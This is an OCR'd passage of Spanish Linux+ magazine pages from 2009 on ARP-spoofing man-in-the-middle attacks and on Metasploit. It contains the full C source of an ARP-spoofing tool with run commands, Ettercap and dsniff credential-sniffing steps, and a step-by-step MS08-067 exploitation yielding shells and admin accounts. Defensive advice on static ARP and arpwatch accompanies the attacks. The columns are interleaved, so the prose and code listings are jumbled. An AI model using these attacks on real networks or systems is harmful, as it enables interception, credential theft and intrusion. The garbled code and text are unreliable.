paso con la entrada del Punto de Acceso, pero
esta vez haciendo click en el botón Add to
Target 2.
Seguidamente, en el menú Mitm, nos en-
contraremos con la opción ARP Poisoning...
49
 hacking para linuxeros
Ataques Man In The Middle

Ésta es la nuestra, una vez dentro, marcaremos

el recuadro Sniff Remote Connections y acep-
taremos.
El ataque está configurado a la perfección.
Ya solo nos queda escoger la opción Start Sni-
ffing del menú Start.
En un ataque real, no podríamos ver lo
siguiente, pero como esto es un ensayo, po-
demos echar un vistazo a cómo ha quedado
modificada (hackeada), la tabla caché ARP
de la víctima.
Lo que acabamos de realizar es un ata-
que de una sola vía, esto quiere decir que
podemos capturar todo el tráfico que trans-
Figura 7. Sesión de Ettercap mita la víctima (192.168.0.192), pero no
lo que el Punto de Acceso responde. Para
lograr el doble enlace debe abrir una nueva
sesión de Ettercap y realizar exactamente
los mismos pasos que acabamos de describir
excepto que el Punto de Acceso correspon-
derá a Add to Target 1 y la víctima a Add to
Target 2.
En el menú View, encontrará 3 pestañas
muy importantes:

• Connections,
• Profiles,
• Statistics.

En ellas verá todos los movimientos que rea-

Figura 8. Visita a la página oficial de LiNUX+
liza la víctima. En la siguiente imagen podrá
ver como es capturada una visita a la página
oficial de LiNUX+ (www.lpmagazine.org).
El marco inferior del programa Ettercap
también es muy significativo, en este lugar
podrán ir apareciendo distintas contraseñas
relativas a conexiones realizadas a servicios
como: FTP, Telenet, Autenticaciones Web,
etc...

Prueba de concepto
En el mundo del hacking y la seguridad infor-
mática existe un punto de ética muy importante,
y es demostrar que nosotros mismos podemos
hacerlo. En otro caso solo cabríamos bajo el
concepto de Script Kiddie, o aquella persona
que se apropia del trabajo de los demás con el
único objetivo de lograr un beneficio o recono-
cimiento.
Lo que aquí pretendo, es demostrar que
pueden generarse respuestas ARP gratuitas
con muy pocas líneas de código (Listado 1).

¿Cómo funciona?
El programa precisa 6 opciones con sus corres-
pondientes argumentos:

• -i: Dirección IP de la víctima.

Figura 9. Contraseñas relativas a conexiones realizadas • -m: Dirección MAC de la víctima.

50 Linux+ 4/2009
 hacking para linuxeros
Ataques Man In The Middle

Tabla 1. Herramienats del paquete dsniff • -r: IP del router o Punto de Acceso.
dsniff Captura las contraseñas que viajan por la red • -n: Número de respuestas ARP a ser en-
arpspoof Modifica la caché ARP de un host víctima viadas.
• -t: Segundos de espera entre envío res-
dnspoof Falsifica las respuestas DNS (Nombres de Dominio)
puestas ARP.
mailsnarf Captura el tráfico de salida y entrada: SMTP y POP3
• -d: Nombre de la interfaz de red.
msgsnarf Captura conversaciones de mensajeria instantánea: MSN, IRC, Yahoo!, etc.
filesnarf Captura ficheros transmitidos mediante NFS Usted mismo puede comprobar la eficacia del
macof Denegación de servicio mediante inundación con MAC's falsas programa. En primer lugar compile el código
sshow Analiza tráfico SSH v1 y v2 con el siguiente comando:
tcpkill Finaliza cualquier conexión establecida
$ gcc arps.c -lnet -o arps
tcpnice Dismunye la velocidad en conexiones establecidas
webspy Captura las URL visitadas por la víctima, y las abre en su propio navegador
Luego ejecute el programa con permisos de
urlsnarf Captura las URL visitadas por la víctima y las muestra por pantalla root, con los parámetros adecuados:

Listado 1a. Generando respuestas ARP gratuitas

[--arps.c--] }
#include <errno.h> libnet_destroy(lnet);
#include <getopt.h> }
#include <stdio.h> int main(int argc, char *argv[]) {
#include <stdlib.h> libnet_ptag_t ethh_pkt;
#include <libnet.h> libnet_ptag_t arph_pkt;
#define ARP_REPLY 2 ethh_pkt = arph_pkt = LIBNET_PTAG_INITIALIZER;
static in_addr_t trg_ip, gtw_ip; trg_ip = gtw_ip = 0;
/* IP's DEL OBJETIVO Y EL ROUTER */ u_int32_t p[6];
static struct libnet_ether_addr *gtw_ha; int n;
/* MAC DEL ROUTER */ char opt;
libnet_t *lnet; /* DESCRIPTOR DE LIBNET */ char *device;
struct host { char errbuf[256];
char ip_addr[16]; int narps, towait;
/* Direccion IP */ struct host evil, target, router;
u_int8_t mac_addr[6]; while ((opt = getopt(argc, argv,
/* Direccion MAC */ "i:m:r:n:t:d:")) != -1) {
}; switch (opt) {
void usage(char *prog) { case 'i':
printf("\nARPS by blackngel\n"); strncpy(target.ip_addr, optarg, 15);
printf("-----------------"); break;
printf("\nUSO: %s <opciones>\n \ case 'm': {
-i <IP host objetivo>\n \ n = sscanf(optarg,
-m <MAC host objetivo>\n \ "%02x:%02x:%02x:%02x:%02x:%02x",
-r <IP router o AP>\n \ &p[0],&p[1],&p[2],&p[3],&p[4],&p[5]);
-n <numero de ARPs>\n \ if (n != 6) {
-t <espera entre ARPs>\n \ fprintf(stderr,
-d <interfaz de red>\n", prog); "\nDireccion MAC no valida\n");
} return 0;
void send_arps(int count, int towait) { }
int cnt = 0; for (n = 0 ; n < 6 ; n++)
while (cnt < (int)count) { target.mac_addr[n] = (u_int8_t)p[n];
if (libnet_write(lnet) < 0) { break;
fprintf(stderr, "\nlibnet write }
error: %d\n", cnt); case 'r':
return; strncpy(router.ip_addr, optarg, 15);
} break;
cnt += 1; case 'n':
printf("Enviando paquete nº %d\n", cnt); narps = atoi(optarg);
sleep(towait); break;

www.lpmagazine.org 51
 hacking para linuxeros
Ataques Man In The Middle

Listado 1b. Generando respuestas ARP gratuitas

case 't':
towait = atoi(optarg);
break;
case 'd':
device = optarg;
break;
default:
usage(argv[0]);
break;
}
}
if (optind < 12) {
usage(argv[0]);
exit(0);
}
if ((lnet = libnet_init(LIBNET_LINK, device, errbuf)) == NULL) {
fprintf(stderr, "libnet_init failed: %s\n", errbuf);
return -1;
}
// DIRECCION IP DEL OBJETIVO
trg_ip = libnet_name2addr4(lnet, target.ip_addr, LIBNET_RESOLVE);
// DIRECCION IP DEL ROUTER O PASARELA
gtw_ip = libnet_name2addr4(lnet, router.ip_addr, LIBNET_RESOLVE);
// MAC DEL ROUTER SUPLANTADA POR LA DEL ATACANTE
gtw_ha = libnet_get_hwaddr(lnet);
/* CONSTRUIMOS RESPUESTA ARP*/
arph_pkt = libnet_build_arp(1, 0x0800, 6, 4, ARP_REPLY,(u_int8_t *)gtw_ha, (u_char *)&gtw_ip,
(u_int8_t *)target.mac_addr, (u_char *)&trg_ip, NULL, 0, lnet, arph_pkt);
if (arph_pkt == -1) {
perror("libnet_build_arp: ");
return -1;
}
/* CONSTRUIMOS CAPA ETHERNET */
ethh_pkt = libnet_build_ethernet(target.mac_addr,
(u_int8_t *)gtw_ha,
0x0806, NULL, 0, lnet, ethh_pkt);
if (ethh_pkt == -1) {
perror("libnet_build_ethernet: ");
return -1;
}
printf("\n***** Enviando ARP REPLY al objetivo *****\n\n");
send_arps(narps, towait);
/* AQUI COMIENZA EL ATAQUE */
printf("\n\n***** Ataque ARP-Spoof finalizado *****\n");
return 1;
}
[--arps.c--]

# ./arps -i Si mira ahora la tabla de entradas ARP del host MAC correspondiente a la IP de la víctima,
192.168.0.192 víctima, verá que aquella que corresponde con evitando así introducirla de forma manual.
-m 00:11:50:ED:6F:47 la dirección IP del router ha sido alterada con
-r 192.168.0.1 la dirección MAC del atacante. Nota: Con un Suite Dsniff
-n 100 -t 1 poco más de código podría lograrse que el pro- Más allá de Ettercap, existe un conjunto de
-d ath0 grama obtenga automáticamente la dirección herramientas diseñadas por Dug Song, que

52 Linux+ 4/2009

forman parte de un famoso paquete llamado
dsniff. Todas estas herramientas permiten
auditar su red, o ayudarle a recuperar toda
clase de información en medio de un ataque
MITM.
Vamos a describir brevemente cada una de
ellas, y esperamos que sí se le pongan los pelos
de punta (Tabla 1).
Casi todas estas herramientas solo pre-
cisan como único argumento una interfaz
de red, al fin y al cabo solo son sniffers
que buscan por un tráfico determinado y se
lo facilitan a usted de la forma más cómo-
da. ¿Puede imaginarse utilizando WebSpy
y viendo en tiempo real, en su navegador,
las páginas que está visitando una víctima de
un ataque MITM? Sí, lo sabemos, una mara-
villa.
¿Cómo protegernos?
El fallo principal pasa porque las tablas
caché ARP mantienen entradas dinámicas,
y esto permite una alteración en cualquier
momento. Teniendo esto en mente, cabe
pensar que la solución principal también pa-
sa por hacer que estas entradas sean estáti-
cas, y ello es posible. Desde nuestro Sistema
Linux podemos hacer algo como lo que pre-
senta el Listado 2.
Se puede observar como ha cambiado la
entrada. Ahora posee un valor PERM, de per-
manente que indica que esta entrada no puede
ser modificada. La opción -s del programa arp
significa static.
Lo lógico sería crear un script con este co-
mando, que se lance automáticamente cada vez
que el sistema es iniciado. No obstante, aunque
esta solución es práctica en redes de area local
cableadas, presenta dos inconvenientes en otras
situaciones:
• En redes Wifi, una reasociación en la red
puede provocar que las entradas de la ca-
ché sean borradas y dispuestas a ser altera-
das nuevamente.
• En redes cableadas pero con multitud de Como bien hemos dicho a lo largo de este
hosts, la administración puede volverse artículo, los ataques Man in The Middle no
más tediosa.
Listado 2. Haciendo entradas estáticas
# arp -a
? (192.168.0.1) en 00:19:15:72:9C:52
[ether] en ath0
# arp -s 192.168.0.1 00:19:15:72:9C:52
# arp -a
? (192.168.0.1) en 00:19:15:72:9C:52
[ether] PERM en ath0
hacking para linuxeros
Ataques Man In The Middle
Frente a la protección también debemos tener
en cuenta los métodos de detección. Hasta Sobre el autor
ahora no se ha mencionado, pero un ataque
Arp Spoof, no consiste en un único paquete David Puente Castro, alias blackngel, es
de respuesta ARP, sino que, al contrario, un gran aficionado a la programación y la
mientras el ataque se realiza, existe un flujo seguridad informática. Original de Ouren-
constante de este tipo de paquetes. Las tablas se (Galicia) y viviendo actualmente en la
caché ARP se actualizan cada cierto tiempo, provincia de Salamanca dedica la mayor
y es por ello que el ataque que acabamos de parte de su tiempo libre a disfrutar de la
ver se debate en una carrera por llegar antes experiencia Linux.
en esta modificación y continúa este tráfico Asiduo escritor de artículos básicos
de respuestas ARP no solicitadas o gratuitas sobre temas de seguridad informática en
durante el tiempo que sea necesario. el E-Zine electrónico S.E.T. (Saqueadores
Un IDS como Snort, muy conocido en Li- Edición Técnica), ampliamente conocido
nux, es capaz de detectar este tráfico malicioso en el Underground Hispano. Actualmen-
y responder consecuentemente. te mantiene su segunda página oficial
En un sistema operativo Linux, quizás la en: http://set.diazr.com/, cuyo principal
herramienta más apropiada en pro de la detec- objetivo, radica en ocupar el lugar que en
ción de un envenenamento ARP, es ArpWat- su momento cubrió la web de Hackemate
ch, la cual puede descargar desde la siguiente como repositorio de material sobre temas
dirección: ftp://ftp.ee.lbl.gov/arpwatch.tar.gz. de hacking.
Aunque es un programa que proporciona Su primer encuentro con Linux data
más opciones, trabaja mas o menos de la ya de hace unos 8 años y fue poco más
misma forma que el plugin Scan Poisoner adelante que descubrió el fantástico
de Ettercap, el cual puede utilizar también mundo de la programación y la subcul-
para detectar comportamientos extraños en tura hacker. Participa activamente en
las tablas ARP. wargames como: yoire.com, warzone
Si observamos nuevamente la imagen en (elhacker.net) y otros.
la que presentábamos las entradas ARP alte- Aunque trabaja con ordenadores, la
radas, se puede ver como en realidad exis- mayor parte de sus tareas diarias no tie-
ten 2 entradas. Una pertenece al atacante nen una relación directa con esta temática.
con su dirección MAC respectiva real. La Auxiliar administrativo, obligado a utilizar el
otra corresponde al router o Punto de Acce- sistema operativo Windows, tiene la cos-
so con la dirección MAC modificada. Pero tumbre de llevarse su última Distribución
ambas coinciden, y eso es exactamente lo Live a la oficina para seguir disfrutando
que buscan los programas anteriores, dos di- de su SO favorito, Linux, y desarrollar sus
recciones MAC repetidas en la red que dela- pequeños proyectos.
tan de forma inmediata una suplantación de Dedica el artículo a su pareja y familia
identidad. por la paciencia que demuestran cuando
Por lo demás, mi mejor consejo es que uti- intenta explicarles qué es lo que realmente
lice siempre que pueda software que cifre sus está haciendo.
datos cuando viajan por la red. Nunca se sabe Por lo demás, puede encontrarlo
en manos de quién pueden llegar caer... online, prácticamente las 24 horas
del día, en las siguientes direcciones:
Conclusión blackngel1@gmail.com y black@set-
ezine.org
son nuevos, pero al tiempo que resultan ex- tremadamente sencillos de realizar, siguen
conservando toda su magia y efectividad.
Esto, unido al desconocimiento general de
los cibernautas, termina constituyendo un
agujero muy serio en la seguridad de la red,
y por lo tanto, en su propia seguridad.
Hasta la próxima, y feliz hacking. La
humanidad necesita con urgencia una nueva
sabiduría que proporcione el conocimiento
de como usar el conocimiento para la super-
vivencia del hombre y para la mejora de la
calidad de vida.
www.lpmagazine.org 53
 hacking para linuxeros
Proyecto Metasploit

Proyecto Metasploit
David Puente Castro
Metasploit es un proyecto libre que ha sido diseñado con el objetivo de proveer
una plataforma de trabajo a los desearrolladores de herramientas de seguridad
y exploits. Es una estructura modularizada que permite una rápida elaboración
de programas de ataque y análisis de vulnerabilidades.

E
scrito en lenguaje Perl desde sus primeras versio- Actualmente cuenta con 263 exploits y 117 cargas dispues-
linux@software.com.pl

nes, ha sido reescrito en Ruby aportando ahora tas para ser utilizadas y lograr el control de casi cualquier
una mayor flexibilidad. Soporta los siguientes sistema. Debe de tener en cuenta que el Proyecto Metasploit
sistemas operativos: vio la luz por primera vez hacia finales del 2003, y por aquel
entonces, contaba con la nada despreciable cantidad de 30
• Linux, BSD, MacOS X, Windows Cygwin, exploits y 30 cargas.
• Windows 2000 / XP / 2003 / Vista.
¿Qué es un exploit?
Puede descargar la útlima versión, la 3.2, publicada bajo y ¿qué es una carga?
licencia BSD, desde la siguiente dirección: http://www.meta
Un exploit es un programa que está diseñado para sacar
sploit.com/framework/download/ provecho de una vulnerabilidad que ha sido encontrada en
También puede encontrar Metasploit incluido en la fa-
cierto programa y que puede provocar un comportamiento
mosa distribución de seguridad BackTrack. distinto a lo que originalmente estaba planeado por el
Metasploit es la alternativa perfecta a programas comer-
programador.
ciales como IMPACT de la empresa Core o CANVAS de la Por norma general, estos comportamientos son dos. Por
empresa Immunity. Pero existen grandes diferencias que laun lado están las Denegaciones de Servicio (o DoS), que
separa de estas dos últimas: se producen cuando se consigue que un programa deje de
responder. Ya sea porque se haya finalizado inesperadamente
• Está disponible para entornos Unix (CANVAS también). o porque se provoca un agotamiento de los recursos del sis-
• Metasploit es una herramienta gratuita, frente a los tema, como puede ser la memoria, y el programa no puede
2500/25000 dólares que puede costar la primera y los atender más peticiones. En la vida diaria, el usuario suele
950 dólares de la segunda. decir que: el programa se ha colgado.

54 Linux+ 4/2009
 hacking para linuxeros
Proyecto Metasploit

• http://www.xatakamovil.com/2007/09/27-
iphone-y-metasploit-tremenda-combina-
cion
• http://secmaniac.blogspot.com/2008/07/
metasploit-3-on-iphone.html

Antes de nada echemos un vistazo a lo que

tenemos entre nuestras manos. Descomprima
el fichero que acaba de descargar:

$ tar -xvzf framework-3.2.tar.gz

...
...
$ cd framework-3.2/

Dentro del directorio principal de Metasploit,

entre los elementos más importantes tenemos:

• msfconsole -> Plataforma de ataque des-

de la línea de comandos.
• Msfgui -> Plataforma de ataque con inter-
Figura 1. Plataforma de ataque a través de un servidor web
faz gráfica.
Por otro lado, el segundo comportamien- Debido a la jerga y terminología de Meta- • Msfweb -> Plataforma de ataque a través
to es conocido como: ejecución de código sploit, también es posible que a lo largo del de un servidor web (Figura 1).
arbitrario. Existen ciertas vulnerabilidades, artículo se haga uso del término Payload
cuya explicación queda fuera del alcance de cuando deseamos hacer referencia al uso de En realidad, estas tres herramientas permiten
este artículo, que permiten cambiar el flujo de una Carga. alcanzar el mismo objetivo, aunque cada una
ejecución de un programa. La mayoría de los de ellas presenta sus ventajas según las costum-
programas se suelen ejecutar línea a línea, ¿Algo más? bres diarias del usuario que las utiliza.
y existe por lo tanto en todos los procesado- Para los mas geeks, Metasploit es capaz de correr Metasploit le permite emparejar infinidad
res un registro conocido como IP, que siem- a día de hoy bajo un iPhone, prueba de que los de cargas con un solo exploit correspondiente.
pre contiene la dirección de la siguiente línea límites de la imaginación tienden a desaparecer Puede entenderse como una filosofía: Usted
o instrucción a ejecutar. Resulta que dichas a medida que la tecnología evoluciona a pasos elige.
vulnerabilidades, conocidas con el nombre agigantados. Puede encontrar más información No todas las cargas funcionan con todos
de buffer overflows, heap overflows, etc... en las siguientes direcciones: los ataques, pero con la práctica no tardará
permiten cambiar la dirección de este regis-
tro IP y lograr que apunte a un código que
ha sido preparado intencionadamente por el
atacante.
Este código tiene normalmente como
finalidad, ejecutar una shell con permisos
elevados, ejecutar un comando en el sistema
atacado o introducir una nueva cuenta con
permisos de administrador. Es debido al
primero de los objetivos, que este código es
conocido en la jerga como Shellcode.
En Metasploit, a estos Shellcode se les
conoce por el nombre de Cargas. Como se ha
dicho, cada carga realiza una acción distinta.
Una vez el atacante elige un exploit para vul-
nerar un programa, él puede elegir si desea
obtener una shell, una shell inversa, una nue-
va cuenta de usuario o simplemente ejecutar
un comando ls -al en el directorio raiz. La
única regla es que, como las cargas están cla-
sificadas según el sistema operativo que vaya
a ser atacado, es imposible que funcione una
carga para Windows en un exploit que ataca
un programa de Linux. Figura 2. Opciones de exploit a ser establecidas

www.lpmagazine.org 55
 hacking para linuxeros
Proyecto Metasploit
Figura 3. El comando exploit tiene éxito
en saber elegir la correcta en el momento
adecuado.
Lo mejor de este entorno de desarrollo
y pruebas, es su estructura modularizada. Por su
parte, cada ataque se centra en un conjunto de
objetivos diferentes. De este modo usted pue-
de fijar en su mente que sistema desea atacar,
y centrarse única y exclusivamente en aquellas
vulnerabilidades que exploten estos sistemas en
concreto.
Prueba de ataque
Metasploit fue creado con una idea muy clara
en mente: ser la herramienta de uso común
para la realización de pruebas de penetra-
ción. Con esto en mente, la mejor manera
de comprobar su efectividad es a través de
un ejemplo.
A continuación mostaré la facilidad con •
que un sistema operativo no sometido a las
Figura 4. Cuenta de acceso nueva al sistema
56
correspondientes actualizaciones y parches
diarios, puede ser comprometido en menos
de un minuto y con tan solo unas pocas
pulsaciones.
Realizaré el ataque bajo equipos de mi
propiedad, no haciéndome responsable del
uso o abuso que pueda darse a esta infor-
mación.
Tiempo tendrá de comprobar las fa-
cilidades del GUI o de la interfaz web,
pero veamos como msfconsole no se
queda atrás. Esta última posee la cualidad
de mantener el estado de ejecución, lo que •
quiere decir que puede repetir el mismo
ataque cuantas veces desee sin la necesidad
de establecer nuevamente los parámetros
básicos:
Ejecute msfconsole:
$ ./msfconsole
Linux+ 4/2009
• Puede visualizar todos los exploits o pa-
yloads mediante el comando show:
msf > show exploits
msf > show payloads
• Con el comando use tomaremos el que
más se adapte a nuestras necesidades. En
este caso haremos uso de una vulnera-
bilidad descubierta recientemente en
las últimas versiones, incluidos Service
Pack de los productos de Microsoft.
Puede consultar la gravedad del bug en
la siguiente dirección: http://www.micro
soft.com/technet/security/bulletin/MS08-
067.mspx. Seleccionemos el exploit y pos-
teriormente la carga:
• msf > use windows/
smb/ms08_067_netapi,
• msf exploit(ms08_067_netapi) >
set PAYLOAD windows/
shell/bind_tcp,
• PAYLOAD => windows/
shell/bind_tcp.
• Como puede ver, el prompt ha cambia-
do tras la selección del exploit, y esta
carga específica nos proporciona una
shell directa al sistema si el ataque tie-
ne éxito.
Puede ver los sistemas vulnerables al
ataque y sus correspondientes versio-
nes haciendo uso del comando show
targets. También obtendrá informa-
ción específica del bug con el coman-
do: info.
• Todo exploit y carga necesitan unas op-
ciones a ser establecidas. Veamos qué
nos piden en este caso (Figura 2). Solo
el parámetro RHOST se encuentra sin un
valor. Ese valor en concreto hace refe-
rencia a la dirección IP del sistema que
deseamos atacar. En nuestro ejemplo
será como sigue:
msf exploit
(ms08_067_netapi) >
set RHOST 192.168.0.192,
RHOST => 192.168.0.192.
• Hasta aquí tenemos todo listo y dis-
puesto para lanzar nuestra carga. Si
el comando exploit tiene éxito, ob-
tendrá en su sistema lo que presenta la
Figura 3.
Apenas ha seguido 5 pasos y ahora tiene un
sistema comprometido en sus manos.
Pero las facilidades de Metasploit no
terminan aquí. Puede guardar todas las
opciones del ataque y utilizarlo posterior-
mente sin mayor esfuerzo. El comando
save guarda en un archivo de configuración
todos los parámetros anteriormente estable-
 hacking para linuxeros
Proyecto Metasploit

www.lpmagazine.org 57
 hacking para linuxeros
Proyecto Metasploit

• Abajo/izquierda: Información del ataque

actual y resultados de salida.
• Abajo/derecha: Sesiones (shells) abiertas,
tras un ataque exitoso.

Basta con hacer doble click en la vulnera-

Figura 5. El mismo resultado obtenido con msfgui
cidos. Si sale del programa (exit) y pos-
teriormente vuelve a él para probar nueva-
menente el ataque, no tiene más que selec-
cionar el exploit y ejecutarlo.
¿Qué más?
Si por ejemplo usted hubiera deseado una
conexión inversa (donde el sistema vulne-
rado es el que se conecta a usted para pro-
porcionarle la shell de comandos),podría
haber elegido la carga windows/shell/
reverse_tcp y establecer los parámetros
LHOST y LPORT según sus preferencias. Por
ejemplo:
que intuitiva interfaz del programa msfgui y buscar la carga Windows Execute Command.
(Figura 5).
La ventana principal está dividida en 4 completar es el de CMD, donde usted deberá
zonas. Las más importantes:
• Arriba/izquierda: Estructura en árbol con
todos los ataques.
bilidad que vaya a analizar y dejarse llevar
a través de un asistente donde podrá ir intro-
duciendo todos los datos necesarios.
Por otro lado, para los exploiters, la po-
sibilidad de crear automáticamente cargas en
forma de shellcodes, resulta en una ventaja
cuando la velocidad prima ante todo. Msfweb
es la aplicación perfecta para estos fines.
Lo que esta aplicación logra en primera
instancia, es abrir un pequeño servidor web
en el puerto 55555 al que puede conectarse
via su navegador favorito (Figura 6).
Una vez se encuentre en la página prin-
cipal, puede hacer click en el boton Payloads
Una vez dentro, el campo más importante al
elegir qué aplicación desea ejecutar en el sis-
tema vulnerable.
También el campo Restricted Characters
puede brindarle la posibilidad de eliminar los

• LHOST -> La dirección IP de su sistema

en la red.
• LPORT -> Puerto en el que tiene un servi-
dor escuchando.
Figura 6. Abriendo un pequeño servidor web en el puerto 55555
Puede hacer uso de la navaja suiza netcat
disponible por defecto en casi todas las dis-
tribuciones de Linux para abrir un puerto a la
escucha en su sistema:

$ nc -lvvp 4444

También podría haber añadido una cuenta de

acceso nueva al sistema con el PAYLOAD
windows/adduser. Lo que quiero que vean
es que las posibilidades son ilimitadas y solo
tiene que dar rienda suelta a su imaginación
(Figura 4).

Msfgui / Msfweb
Cuando domine al menos la mitad de la
potencia que le ofrece msfconsole, des-
cubrirá que puede obtener exactamente el
mismo resultado si se deja guiar por la más Figura 7. Windows Execute Command

58 Linux+ 4/2009

Sobre el autor
David Puente Castro, alias blackngel, es
un gran aficionado a la programación y la
seguridad informática. Original de Ouren-
se (Galicia) y viviendo actualmente en la
provincia de Salamanca dedica la mayor
parte de su tiempo libre a disfrutar de la
experiencia Linux.
Asiduo escritor de artículos básicos
sobre temas de seguridad informática
en el E-Zine electrónico S.E.T. (Saquea-
dores Edición Técnica), ampliamente
conocido en el Underground Hispano.
Actualmente mantiene su segunda pá-
gina oficial en: http://set.diazr.com/, cuyo
principal objetivo, radica en ocupar el lu-
gar que en su momento cubrió la web de
Hackemate como repositorio de material
sobre temas de hacking.
Su primer encuentro con Linux data
ya de hace unos 8 años y fue poco más
adelante que descubrió el fantástico mun-
do de la programación y la subcultura
bytes NULL que suelen significar fin de cade-
na y que normalmente provocan un fallo en
el momento de la explotación.
Debe recordar que los Shellcodes son
utilizados en vulnerabilidades del tipo buffer
overflow, por lo tanto, estos Shellcodes en
realidad son una cadena de caracteres que
será almacenada en el buffer del programa
vulnerable. En el lenguaje de programación
C, un caracter “\0” significa fin de cadena,
y en este lugar las cadenas de caracteres son
truncadas y lo que haya a su derecha se pier-
de. Si en medio de nuestro Shellcode se infil-
tra un byte \x00, el programa interpreta que
ahí finaliza la cadena, y nuestra Carga queda-
ría cortada en ese lugar, algo que a nosotros
no nos interesa.
Figura 8. Mut’s blog
hacker. Participa activamente en warga-
mes como: yoire.com, warzone (elhacker.
net) y otros.
Aunque trabaja con ordenadores,
la mayor parte de sus tareas diarias no
tienen una relación directa con esta te-
mática. Auxiliar administrativo, obligado
a utilizar el sistema operativo Windows,
tiene la costumbre de llevarse su última
Distribución Live a la oficina para seguir
disfrutando de su SO favorito, Linux,
y desarrollar sus pequeños proyectos.
Dedica el artículo a su pareja y fa-
milia por la paciencia que demuestran
cuando intenta explicarles qué es lo que
realmente está haciendo.
Por lo demás, puede encontrarlo on-
line, prácticamente las 24 horas del día,
en las siguientes direcciones:
blackngel1@gmail.com
y black@set-ezine.org
Una vez tenga todo listo, haga click en su bien.
generar y obtendrá algo como la captura pre-
sentada en la Figura 7.
Como puede observar, esto ahorra mucho
tiempo a los programadores de exploits, que
pueden trabajar únicamente alrededor del pro-
blema, sin perder el tiempo en la codificación
de la carga necesaria para obtener un beneficio.
Metasploit dispone también de varios mó-
dulos auxiliares que realizarán distintas tareas
por usted y una lista de códigos de no opera-
ción, NOPS, que son instrucciónes que el pro-
cesador ejecuta pero que a su vez no afectan al
flujo de ejecución de una carga. Digamos que,
ante vulnerabilidades como los buffer overflo-
ws, son códigos que pueden ser utilizados de
relleno y que ayudan al éxito del ataque.
www.lpmagazine.org
hacking para linuxeros
Proyecto Metasploit
Por lo demás, en Metasploit todo son faci-
lidades, y usted, como analista de seguridad,
podrá seguir añadiendo sus propios exploits
a la plataforma e ir ampliando así sus capaci-
dades de prueba.
Conclusión
Metasploit es una joya que debería llevar siem-
pre consigo en su arsenal de herramientas, si
su objetivo es probar ataques contra sistemas
vulnerables y proceder a la posterior aplica-
ción de parches.
Tenga en cuenta que es la mejor forma de
demostrar a un cliente que solicita un análisis
o evaluación de seguridad, que sus sistemas
pueden ser comprometidos con demasiada
facilidad, y que tomar contramedidas no es
algo que deba ser dejado al azar.
Es curioso ver una opinión de alguien
que ha descrito a Metasploit como: tal vez
la herramienta más potencialmente dañina
jamás escrita. Personalmente no estoy de
acuerdo con esta idea, pero lo bueno es que
después de este artículo usted puede permi-
tirse el lujo de formular su propia opinión.
No olvide asegurar sus sistemas. Es por
Club Pro
ESPAWEB
www.espaweb.es
Especialistas en planes para Distribuido-
res sobre plataforma Linux y Windows,
marca blanca.
Servidores Dedicados y Housing
Proyectos y Soluciones a Medida
Datacenter propio en Alicante
Soporte técnico altamente cualificado,
24*7
902 380 380
59
 conocimiento libre
Extensión del Copyright en Europa

La polémica del año:

Extensión del Copyright en Europa
José Carlos Cortizo Pérez
El parlamento europeo debate sobre la posible ampliación de los derechos
del copyright, que pasaría de una duración de 70 años a 95, beneficiando
mayoritariamente a las discográficas que, gracias a las cláusulas abusivas que
hacen firmar a los artistas, son quienes poseen los derechos de las obras. Resulta
paradójico que los políticos que deberían defender el desarrollo cultural y el acceso
a la misma, solo sean capaces de regirse por los beneficios de unos pocos.

M
arcos es un joven e imaginativo escritor
linux@software.com.pl

que, gracias a sus vivencias, tiene mucho Este artículo es Libre

que contar. Lleva dos años realizando
una investigación sobre cómo nos podrá
afectar la nanotecnología en un futuro, para escribir una
historia de ciencia ficción que se desarrolla dentro de
medio siglo donde, hipotéticamente, la nanotecnología ha
cambiado de forma radical nuestro día a día. Su libro no
solo pretende ser una obra de ficción que entretenga a mi-
llones de personas, sino también una vía de divulgación de
estas nuevas tecnologías, de forma que Marcos formará,
en cierta medida, a muchas personas para que sean más
capaces de comprender algunas de las tecnologías que irán
afectándonos en un futuro cercano.
A pesar de llevar una vida austera, Marcos necesita po-
der comer, dormir, material para escribir, dinero para viajar
y hablar con algunos científicos que le asesoren en el ma-
terial a escribir, etc. Por suerte, hay mucha gente dispuesta
a ofrecerle su apoyo de diversas maneras. Vive en un piso
de una familia rica que, al no utilizarlo, se lo cede de forma
gratuita; come gracias a que su vecina al estar sola, coci-
na para los dos; y puede viajar gracias a la colaboración
Los contenidos de este artículo son totalmente libres.
Tanto el texto como las fotografías están licenciados
bajo licencia Creative Commons. La editorial ha tenido
a bien el comprometerse con la causa del conocimiento
libre y liberar, en su Web, los contenidos de esta sección
regular, dos meses después de aparecer su versión fí-
sica en los kioscos.
desinteresada de algunas pequeñas y medianas empresas
que apoyan su investigación. ¿Y por qué toda esta gente
le ayudan de forma tan desinteresada? La respuesta es
simple, todos sabemos que la cultura es uno de los bienes
más preciados que tenemos como Sociedad, así que resulta
lógico que los que consumimos cultura apoyemos a los
creadores de la misma.
Después de 2 años investigando, y otro entero escri-
biendo su novela, Marcos la publicó en acceso abierto, para
que todo el mundo pudiera consumir su obra, una generosa
aportación al desarrollo de la cultura que pudo realizar gra-

60 Linux+ 4/2009

cias a la aportación de muchas otras personas.
De esta manera, tanto los creadores como los
consumidores de cultura favorecemos al desa-
rrollo de la misma al entrar en una espiral de
contribuciones mutuas.
A pesar de que suene idílica, la historia
anterior es mera ficción. A día de hoy cuesta
encontrar personas que apoyen a otras de for-
ma desinteresada y la cultura se consume sin
cuartel, sin pararnos a pensar en cómo hay que
potenciar el desarrollo de la misma. La historia
no deja de ser un recurso que nos deja entrever
la necesidad de proteger a los artistas, creado-
res de cultura, para que puedan seguir creando
cultura. Sin algunas medidas proteccionistas,
teniendo en cuenta el cómo actuamos como
Sociedad, los artistas no podrían sustentarse
económicamente para poder seguir creando
cultura, por esta causa, entre otras, nace el
concepto de propiedad intelectual y, dentro
del mismo, los conceptos de derechos de autor
y copyright.
Derechos
de autor y Copyright
Mi postura con respecto a los derechos de au-
tor, copyright, o incluso las patentes, es una
postura un tanto neutra, en línea con la histo-
ria anterior. Las producciones tangibles son
fácilmente controlables: si fabricas puertas
vendes cada puerta física a un coste determi-
nado y no hay mayor problema. Sin embargo,
hay producciones no tangibles, más cercanas
al reino de las ideas, que son las que se tratan
de proteger con la propiedad intelectual. Si
como empresa has invertido millones en una
Figura 1. Un escritor pensativo, en espera de la llamada de la creatividad. Fotografía licenciada bajo CC-by
por re_birf (http://flickr.com/photos/re_birf/)
Figura 2. Ilustración de los distintos actos de Copyright celebrados en los Estados Unidos. La imagen está
licenciada bajo CC-by-sa (http://en.wikipedia.org/wiki/File:Copyright_term.svg)
investigación, es lógico que puedas protegerla
durante un tiempo para que ningún espabila-
do se aproveche y se haga millonario a costa
